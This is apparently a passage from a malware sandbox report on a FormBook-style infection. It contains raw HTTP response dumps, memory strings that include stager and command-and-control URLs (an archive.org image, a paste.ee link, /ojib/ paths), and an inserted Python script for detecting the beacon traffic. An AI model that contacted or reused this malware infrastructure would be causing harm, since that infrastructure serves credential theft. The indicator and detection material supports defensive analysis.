6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:37 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 
fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:40 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 
fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:43 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 
fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
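The GETs to www.autoclean.shop, www.568060007.xyz, www.elitecbdgummies.net and www.airgame.store above, and the POST to /2jpw/, share one shape: a four-character directory, a query or form body carrying a short eight-character tag (mBsxM=YJ0LnZ68) and a long unencoded base64-like value (-Xr8=...), and a fixed User-Agent claiming Firefox 37 on OS X 10.7. The script below is an added detection example; it is not part of the report and not a vendor rule. It scores a request against those indicators and then clusters hosts that share the same short tag, which is how the rotation through decoy domains shows up in proxy logs. The sample requests are constructed from the hosts, paths and the first -Xr8 value shown above; the thresholds (64-character blob, key of 3 to 6 characters) are assumptions chosen to fit this traffic, not documented FormBook constants.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Fixed User-Agent seen on every beacon in the report: Firefox 37 on OS X 10.7, a
# 2015-era string no current browser sends. Weak alone, strong with the URL shape.
BEACON_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) "
             "Gecko/20100101 Firefox/37.0")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")                  # /fx9f/, /2jpw/, /iaoq/, /ojib/
SHORT_ID_RE = re.compile(r"^[A-Za-z0-9]{8}$")              # the mBsxM=YJ0LnZ68 style tag
LONG_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # raw, unencoded base64-like data


def _split_params(s):
    """Split a query string or form body WITHOUT URL-decoding: '+' and '/' are payload bytes here."""
    out = []
    for piece in s.split("&"):
        if piece:
            key, _, value = piece.partition("=")
            out.append((key, value))
    return out


def score_request(method, host, target, user_agent, body=""):
    """Return the list of beacon indicators one HTTP request matches (empty = nothing)."""
    parts = urlsplit(target)
    reasons = []
    if PATH_RE.match(parts.path):
        reasons.append("path")
    params = _split_params(parts.query if method == "GET" else body)
    if any(SHORT_ID_RE.match(v) and 3 <= len(k) <= 6 for k, v in params):
        reasons.append("short-id")
    if any(LONG_BLOB_RE.match(v) for _, v in params):
        reasons.append("long-blob")
    if user_agent == BEACON_UA:
        reasons.append("ua")
    if method == "POST" and parts.query == "" and "long-blob" in reasons:
        reasons.append("post-form-body")
    return reasons


def is_beacon(reasons):
    """Decision rule: URL shape plus blob is required; UA or tag corroborates."""
    return ("path" in reasons and "long-blob" in reasons
            and ("ua" in reasons or "short-id" in reasons))


def campaign_clusters(requests):
    """Group beacon hosts by the short tag they share; FormBook walks a list of decoy
    and real domains with one tag, so a tag spanning several hosts is the campaign."""
    hosts = defaultdict(set)
    for method, host, target, ua, *rest in requests:
        body = rest[0] if rest else ""
        if not is_beacon(score_request(method, host, target, ua, body)):
            continue
        params = _split_params(urlsplit(target).query if method == "GET" else body)
        for k, v in params:
            if SHORT_ID_RE.match(v) and 3 <= len(k) <= 6:
                hosts[f"{k}={v}"].add(host)
    return {tag: sorted(h) for tag, h in hosts.items() if len(h) >= 2}


# Constructed sample log. Hosts, paths and UA mirror the report; BLOB is the -Xr8 value
# from the first GET above, reused for every beacon for brevity.
BLOB = ("yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY"
        "55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus=")
SAMPLE_REQUESTS = [
    ("GET", "www.autoclean.shop", "/fx9f/?mBsxM=YJ0LnZ68&-Xr8=" + BLOB, BEACON_UA),
    ("GET", "www.568060007.xyz", "/2jpw/?-Xr8=" + BLOB + "&mBsxM=YJ0LnZ68", BEACON_UA),
    ("GET", "www.elitecbdgummies.net", "/iaoq/?-Xr8=" + BLOB + "&mBsxM=YJ0LnZ68", BEACON_UA),
    ("POST", "www.568060007.xyz", "/2jpw/", BEACON_UA, "-Xr8=" + BLOB),
    # Benign traffic that must not fire: the stager download, and an old UA with no blob.
    ("GET", "ia600102.us.archive.org", "/32/items/detah-note-v_202410/DetahNote_V.jpg",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/130.0"),
    ("GET", "www.example.com", "/abcd/?id=12345678", BEACON_UA),
]


def flagged_hosts(requests=SAMPLE_REQUESTS):
    """Hosts of every request the decision rule flags, in log order."""
    return [r[1] for r in requests if is_beacon(score_request(*r))]


if __name__ == "__main__":
    print(flagged_hosts())
    print(campaign_clusters(SAMPLE_REQUESTS))
```

Most hosts in a cluster are decoys (the report shows only 404s from www.elitecbdgummies.net), so block and pivot on the whole cluster rather than on the one host that answered. The `_split_params` helper deliberately avoids `urllib.parse.parse_qsl`, which would turn the `+` inside the blob into a space and break the base64 check.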
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7313000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ia600102.us.archive.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2415529480.000001F917296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.airgame.store
Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.airgame.store/ojib/
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2415529480.000001F91724C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2415529480.000001F917269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gamesfunny.top$
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA6C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA730E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.arX
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: dllhost.exe, 0000000B.00000003.2920396732.0000000007F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/mFPBh/0
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://playchill.top/api/axgames/request?domain=$
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
